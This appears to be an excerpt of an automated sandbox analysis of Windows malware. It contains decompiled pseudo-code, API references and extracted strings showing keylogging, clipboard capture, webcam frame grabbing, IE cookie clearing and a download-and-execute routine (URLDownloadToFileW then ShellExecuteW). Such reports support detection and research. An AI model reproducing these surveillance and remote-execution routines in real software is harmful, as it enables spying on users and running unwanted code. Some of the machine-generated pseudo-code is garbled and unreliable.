                                                                                  • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                                                                  • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 004069D7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 00406A01
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 00406A0B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,00017DA8,?), ref: 00406A1D
                                                                                • tolower.MSVCRT ref: 00406A3A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00406ABF
                                                                                Strings
                                                                                • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 004069FB
                                                                                • [End of clipboard text], xrefs: 004069EC
                                                                                • [Ctrl + , xrefs: 00406996
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                                                                • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                                                                • API String ID: 1567161615-398269065
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                                                                • free.MSVCRT(?,0041BA5C,?), ref: 0040D643
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                                                                • String ID: open
                                                                                • API String ID: 2294739476-2758837156
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,0001781A,00000000), ref: 00407779
                                                                                  • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                                                                  • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                                                                  • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                                                                  • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                                                                  • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                                                                  • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                                                                  • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                • API String ID: 4038348890-4073444585
                                                                                • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                                                                • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                                                                • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                                                                • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 19%
                                                                                			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                				char _v20;
                                                                                				char _v36;
                                                                                				void* __ebp;
                                                                                				void* _t22;
                                                                                				void* _t23;
                                                                                				void* _t32;
                                                                                				char* _t33;
                                                                                				void* _t36;
                                                                                				void* _t38;
                                                                                				signed char _t39;
                                                                                				signed char _t41;
                                                                                				char* _t42;
                                                                                				int _t43;
                                                                                				intOrPtr _t65;
                                                                                				signed char _t66;
                                                                                				void* _t68;
                                                                                				intOrPtr* _t71;
                                                                                
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t65 =  *__eax;
                                                                                				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                                                                				_t71 = _t68 + 0x24;
                                                                                				_t22 = _t65 - 0x3c;
                                                                                				if(_t22 == 0) {
                                                                                					_t23 = E0040180C( &_v20, __eflags, 0);
                                                                                					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					_t66 = E00406DD9(_t23);
                                                                                					__eflags = _t66;
                                                                                					if(_t66 != 0) {
                                                                                						 *0x41b2ec = E00407033(_t66, "OpenCamera");
                                                                                						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
                                                                                						 *0x41b2f4 = E00407033(_t66, "GetFrame");
                                                                                						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
                                                                                						 *0x41b2e8 = 1;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                                                                						_push(0x1b);
                                                                                						goto L15;
                                                                                					}
                                                                                				} else {
                                                                                					_t32 = _t22 - 1;
                                                                                					if(_t32 == 0) {
                                                                                						__eflags =  *0x41b2e9;
                                                                                						if(__eflags != 0) {
                                                                                							goto L8;
                                                                                						}
                                                                                					} else {
                                                                                						_t36 = _t32 - 1;
                                                                                						if(_t36 == 0) {
                                                                                							 *0x41b2f0();
                                                                                							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
                                                                                						} else {
                                                                                							_t38 = _t36 - 1;
                                                                                							if(_t38 == 0) {
                                                                                								_t39 =  *0x41b2ec();
                                                                                								__eflags = _t39;
                                                                                								 *0x41b2e9 = _t39;
                                                                                								if(__eflags == 0) {
                                                                                									goto L9;
                                                                                								} else {
                                                                                									L8:
                                                                                									_t33 = E0040180C( &_v20, __eflags, 0);
                                                                                									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                									_push(atoi(_t33));
                                                                                									_push(_a4);
                                                                                									E00401EA2(__eflags);
                                                                                								}
                                                                                							} else {
                                                                                								if(_t38 == 1) {
                                                                                									_t41 =  *0x41b2ec();
                                                                                									_t81 = _t41;
                                                                                									 *0x41b2e9 = _t41;
                                                                                									if(_t41 == 0) {
                                                                                										L9:
                                                                                										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                                                                										_push(0x41);
                                                                                										L15:
                                                                                										E004020C2(_a4);
                                                                                									} else {
                                                                                										_t42 = E0040180C( &_v20, _t81, 0);
                                                                                										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                										_t43 = atoi(_t42);
                                                                                										 *_t71 = 0x3e8;
                                                                                										Sleep(??);
                                                                                										E00401EA2(_t81);
                                                                                										 *0x41b2f0(_a4, _t43);
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				E004017DD( &_v20);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}




















                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00401CF1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                                                                • atoi.MSVCRT ref: 00401D67
                                                                                • Sleep.KERNEL32 ref: 00401D76
                                                                                  • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                                                                  • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                                                                  • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                                                                • atoi.MSVCRT ref: 00401DB4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                • API String ID: 3050406488-3547787478
                                                                                • Opcode ID: b56e0d0e4fbfe05fd84352f21730365c874d700d43d808a0f1e6033429ded951
                                                                                • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                                                                • Opcode Fuzzy Hash: b56e0d0e4fbfe05fd84352f21730365c874d700d43d808a0f1e6033429ded951
                                                                                • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 33%
                                                                                			E00405DD3(void* __ecx, char _a4) {
                                                                                				struct _SYSTEMTIME _v20;
                                                                                				char _v36;
                                                                                				char _v52;
                                                                                				char* _t24;
                                                                                				char* _t25;
                                                                                				char* _t33;
                                                                                				int _t34;
                                                                                				void* _t46;
                                                                                				void* _t47;
                                                                                
                                                                                				_t47 = __ecx;
                                                                                				GetLocalTime( &_v20);
                                                                                				_t24 =  &_v52;
                                                                                				L00414176();
                                                                                				_t25 =  &_v36;
                                                                                				L00414170();
                                                                                				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                				_t46 = malloc(_t25 + 0x64);
                                                                                				_t33 = _v20.wYear & 0x0000ffff;
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
                                                                                				_t34 = sprintf(_t46, _t33);
                                                                                				if( *((char*)(_t47 + 0x3c)) != 0) {
                                                                                					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                                                                				}
                                                                                				if( *((char*)(_t47 + 0x3d)) != 0) {
                                                                                					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                                                                					_t20 = _t47 + 0x34; // 0x0
                                                                                					_t34 = SetEvent( *_t20);
                                                                                				}
                                                                                				free(_t46);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _t34;
                                                                                			}













                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
